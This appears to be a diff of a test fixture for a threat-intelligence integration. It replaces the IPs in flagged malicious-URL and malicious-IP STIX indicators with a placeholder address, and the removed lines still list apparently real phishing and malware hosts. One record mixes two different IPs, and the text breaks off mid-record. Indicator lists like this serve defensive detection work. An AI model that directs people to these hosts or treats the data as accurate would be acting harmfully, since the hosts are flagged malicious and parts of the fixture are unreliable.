CyberCrime\",\"id\":\"indicator--41ca379f-0e97-452f-bed7-0dcaa6509a87\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:13:24.038Z\",\"name\":\"mal_url: http://xmpzi.icu/blue/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xmpzi.icu/blue/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:13:24.038Z\"}", "category": "threat", "type": "indicator", @@ -18145,7 +18145,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386752374Z", + "ingested": "2021-12-13T08:38:40.024723900Z", "original": "{\"created\":\"2020-02-06T02:13:26.405Z\",\"description\":\"TS ID: 55290730786; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--5b354705-abe0-4b58-b088-aba7ddc92d6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-35\"],\"modified\":\"2020-02-06T02:13:26.405Z\",\"name\":\"mal_url: http://155.94.210.79/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://155.94.210.79/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:13:26.405Z\"}", "category": "threat", "type": "indicator", @@ -18196,7 +18196,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386756832Z", + "ingested": "2021-12-13T08:38:40.024731Z", "original": "{\"created\":\"2020-02-06T02:14:04.592Z\",\"description\":\"TS ID: 55290730804; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--6f406e7c-e62d-4431-b7eb-d8bc42d48b54\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:14:04.592Z\",\"name\":\"mal_url: http://lf9a7e2b.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lf9a7e2b.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:04.592Z\"}", "category": "threat", "type": "indicator", @@ -18215,7 +18215,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.16/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-06T02:14:13.434Z", "valid_from": "2020-02-06T02:14:13.434Z", @@ -18239,16 +18239,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.188.60.16/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.188.60.16", - "full": "http://5.188.60.16/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386761521Z", - "original": "{\"created\":\"2020-02-06T02:14:13.434Z\",\"description\":\"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:14:13.434Z\",\"name\":\"mal_url: http://5.188.60.16/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.16/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.434Z\"}", + "ingested": "2021-12-13T08:38:40.024738300Z", + "original": "{\"created\":\"2020-02-06T02:14:13.434Z\",\"description\":\"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:14:13.434Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.434Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18266,7 +18266,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 137.74.20.60", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime", "modified": "2020-02-06T02:14:13.474Z", "valid_from": "2020-02-06T02:14:13.474Z", @@ -18288,12 +18288,12 @@ "first_seen": "2020-02-06T02:14:13.474Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "137.74.20.60" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386766120Z", - "original": "{\"created\":\"2020-02-06T02:14:13.474Z\",\"description\":\"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-16\"],\"modified\":\"2020-02-06T02:14:13.474Z\",\"name\":\"mal_ip: 137.74.20.60\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '137.74.20.60']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.474Z\"}", + "ingested": "2021-12-13T08:38:40.024745400Z", + "original": "{\"created\":\"2020-02-06T02:14:13.474Z\",\"description\":\"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-16\"],\"modified\":\"2020-02-06T02:14:13.474Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.474Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18343,7 +18343,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386771199Z", + "ingested": "2021-12-13T08:38:40.024752800Z", "original": "{\"created\":\"2020-02-06T02:14:13.506Z\",\"description\":\"TS ID: 55290730793; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a2c76402-f9d0-4ea1-9ed0-b035bce4c7a6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-06T02:14:13.506Z\",\"name\":\"mal_url: http://tikkies.eu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tikkies.eu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.506Z\"}", "category": "threat", "type": "indicator", @@ -18394,7 +18394,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386775998Z", + "ingested": "2021-12-13T08:38:40.024759900Z", "original": "{\"created\":\"2020-02-06T02:14:14.285Z\",\"description\":\"TS ID: 55290730805; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--2e110e0c-f7af-4738-bed2-057bebad6f44\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:14:14.285Z\",\"name\":\"mal_url: http://lb1a9935.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lb1a9935.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:14.285Z\"}", "category": "threat", "type": "indicator", @@ -18413,7 +18413,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://69.61.38.147/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime", "modified": "2020-02-06T02:14:30.841Z", "valid_from": "2020-02-06T02:14:30.841Z", @@ -18437,16 +18437,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://69.61.38.147/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "69.61.38.147", - "full": "http://69.61.38.147/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386780657Z", - "original": "{\"created\":\"2020-02-06T02:14:30.841Z\",\"description\":\"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime\",\"id\":\"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-06T02:14:30.841Z\",\"name\":\"mal_url: http://69.61.38.147/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://69.61.38.147/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:30.841Z\"}", + "ingested": "2021-12-13T08:38:40.024767Z", + "original": "{\"created\":\"2020-02-06T02:14:30.841Z\",\"description\":\"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime\",\"id\":\"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-06T02:14:30.841Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:30.841Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18464,7 +18464,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://107.175.150.73/~giftioz/.golob/ds.php", + "name": "mal_url: http://89.160.20.156/~giftioz/.golob/ds.php", "description": "TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-02-07T01:58:49.531Z", "valid_from": "2020-02-07T01:58:49.531Z", @@ -18489,16 +18489,16 @@ "url": { "path": "/~giftioz/.golob/ds.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.golob/ds.php", + "original": "http://89.160.20.156/~giftioz/.golob/ds.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.golob/ds.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.golob/ds.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386787440Z", - "original": "{\"created\":\"2020-02-07T01:58:49.531Z\",\"description\":\"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.531Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.golob/ds.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.golob/ds.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.531Z\"}", + "ingested": "2021-12-13T08:38:40.024774200Z", + "original": "{\"created\":\"2020-02-07T01:58:49.531Z\",\"description\":\"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.531Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.golob/ds.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.golob/ds.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.531Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18516,7 +18516,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://107.175.150.73/~giftioz/.jonovis/xr.php", + "name": "mal_url: http://89.160.20.156/~giftioz/.jonovis/xr.php", "description": "TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-02-07T01:58:49.782Z", "valid_from": "2020-02-07T01:58:49.782Z", @@ -18541,16 +18541,16 @@ "url": { "path": "/~giftioz/.jonovis/xr.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.jonovis/xr.php", + "original": "http://89.160.20.156/~giftioz/.jonovis/xr.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.jonovis/xr.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.jonovis/xr.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386799422Z", - "original": "{\"created\":\"2020-02-07T01:58:49.782Z\",\"description\":\"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--44a6ba7f-2847-45c5-b4f3-452582094240\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.782Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.jonovis/xr.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.jonovis/xr.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.782Z\"}", + "ingested": "2021-12-13T08:38:40.024781500Z", + "original": "{\"created\":\"2020-02-07T01:58:49.782Z\",\"description\":\"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--44a6ba7f-2847-45c5-b4f3-452582094240\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.782Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.jonovis/xr.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.jonovis/xr.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.782Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18568,7 +18568,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://194.32.79.80/xcool!/admin.php", + "name": "mal_url: http://89.160.20.156/xcool!/admin.php", "description": "TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime", "modified": "2020-02-07T01:59:00.621Z", "valid_from": "2020-02-07T01:59:00.621Z", @@ -18593,16 +18593,16 @@ "url": { "path": "/xcool!/admin.php", "extension": "php", - "original": "http://194.32.79.80/xcool!/admin.php", + "original": "http://189.160.20.156/xcool!/admin.php", "scheme": "http", - "domain": "194.32.79.80", - "full": "http://194.32.79.80/xcool!/admin.php" + "domain": "189.160.20.156", + "full": "http://189.160.20.156/xcool!/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386818899Z", - "original": "{\"created\":\"2020-02-07T01:59:00.621Z\",\"description\":\"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime\",\"id\":\"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-07T01:59:00.621Z\",\"name\":\"mal_url: http://194.32.79.80/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://194.32.79.80/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:59:00.621Z\"}", + "ingested": "2021-12-13T08:38:40.024793300Z", + "original": "{\"created\":\"2020-02-07T01:59:00.621Z\",\"description\":\"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime\",\"id\":\"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-07T01:59:00.621Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://189.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:59:00.621Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18620,7 +18620,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://107.175.150.73/~giftioz/.fotoci/ji.php", + "name": "mal_url: http://89.160.20.156/~giftioz/.fotoci/ji.php", "description": "TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-02-07T02:01:59.646Z", "valid_from": "2020-02-07T02:01:59.646Z", @@ -18645,16 +18645,16 @@ "url": { "path": "/~giftioz/.fotoci/ji.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.fotoci/ji.php", + "original": "http://89.160.20.156/~giftioz/.fotoci/ji.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.fotoci/ji.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.fotoci/ji.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386825842Z", - "original": "{\"created\":\"2020-02-07T02:01:59.646Z\",\"description\":\"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--a8895396-ac11-49f3-bb81-6e854b871870\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:01:59.646Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.fotoci/ji.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.fotoci/ji.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:01:59.646Z\"}", + "ingested": "2021-12-13T08:38:40.024800800Z", + "original": "{\"created\":\"2020-02-07T02:01:59.646Z\",\"description\":\"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--a8895396-ac11-49f3-bb81-6e854b871870\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:01:59.646Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.fotoci/ji.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.fotoci/ji.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:01:59.646Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18672,7 +18672,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://107.175.150.73/~giftioz/.hokbi/cv.php", + "name": "mal_url: http://89.160.20.156/~giftioz/.hokbi/cv.php", "description": "TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-02-07T02:02:24.529Z", "valid_from": "2020-02-07T02:02:24.529Z", @@ -18697,16 +18697,16 @@ "url": { "path": "/~giftioz/.hokbi/cv.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.hokbi/cv.php", + "original": "http://89.160.20.156/~giftioz/.hokbi/cv.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.hokbi/cv.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.hokbi/cv.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386831693Z", - "original": "{\"created\":\"2020-02-07T02:02:24.529Z\",\"description\":\"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:02:24.529Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.hokbi/cv.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.hokbi/cv.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:02:24.529Z\"}", + "ingested": "2021-12-13T08:38:40.024806100Z", + "original": "{\"created\":\"2020-02-07T02:02:24.529Z\",\"description\":\"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:02:24.529Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.hokbi/cv.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.hokbi/cv.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:02:24.529Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18724,7 +18724,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 91.215.169.50", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", "modified": "2020-02-08T14:02:11.920Z", "valid_from": "2020-02-08T14:02:11.92Z", @@ -18746,12 +18746,12 @@ "first_seen": "2020-02-08T14:02:11.920Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "91.215.169.50" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386836732Z", - "original": "{\"created\":\"2020-02-08T14:02:11.92Z\",\"description\":\"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--0e0304f5-9735-4c6d-a860-95633369db34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:02:11.92Z\",\"name\":\"mal_ip: 91.215.169.50\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '91.215.169.50']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:11.92Z\"}", + "ingested": "2021-12-13T08:38:40.024830800Z", + "original": "{\"created\":\"2020-02-08T14:02:11.92Z\",\"description\":\"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--0e0304f5-9735-4c6d-a860-95633369db34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:02:11.92Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:11.92Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18769,7 +18769,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 47.254.179.14", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime", "modified": "2020-02-08T14:02:14.399Z", "valid_from": "2020-02-08T14:02:14.399Z", @@ -18791,12 +18791,12 @@ "first_seen": "2020-02-08T14:02:14.399Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "47.254.179.14" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386841681Z", - "original": "{\"created\":\"2020-02-08T14:02:14.399Z\",\"description\":\"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-08T14:02:14.399Z\",\"name\":\"mal_ip: 47.254.179.14\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '47.254.179.14']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:14.399Z\"}", + "ingested": "2021-12-13T08:38:40.024834800Z", + "original": "{\"created\":\"2020-02-08T14:02:14.399Z\",\"description\":\"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-08T14:02:14.399Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:14.399Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18846,7 +18846,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386846611Z", + "ingested": "2021-12-13T08:38:40.024839800Z", "original": "{\"created\":\"2020-02-08T14:02:17.271Z\",\"description\":\"TS ID: 55298068887; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--257cd2f9-ce06-4091-83e2-63d61b7e8bfa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-08T14:02:17.271Z\",\"name\":\"mal_url: http://smineolo39wings.in/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smineolo39wings.in/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:17.271Z\"}", "category": "threat", "type": "indicator", @@ -18897,7 +18897,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386851199Z", + "ingested": "2021-12-13T08:38:40.024847200Z", "original": "{\"created\":\"2020-02-08T14:02:23Z\",\"description\":\"TS ID: 55298071788; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--8438ae84-2b7d-4fea-b1cd-fbec85ea3e58\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-08T14:02:23Z\",\"name\":\"mal_url: http://go.trust-oot.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://go.trust-oot.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23Z\"}", "category": "threat", "type": "indicator", @@ -18916,7 +18916,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://178.62.186.112/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime", "modified": "2020-02-08T14:02:23.507Z", "valid_from": "2020-02-08T14:02:23.507Z", @@ -18940,16 +18940,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://178.62.186.112/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "178.62.186.112", - "full": "http://178.62.186.112/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": 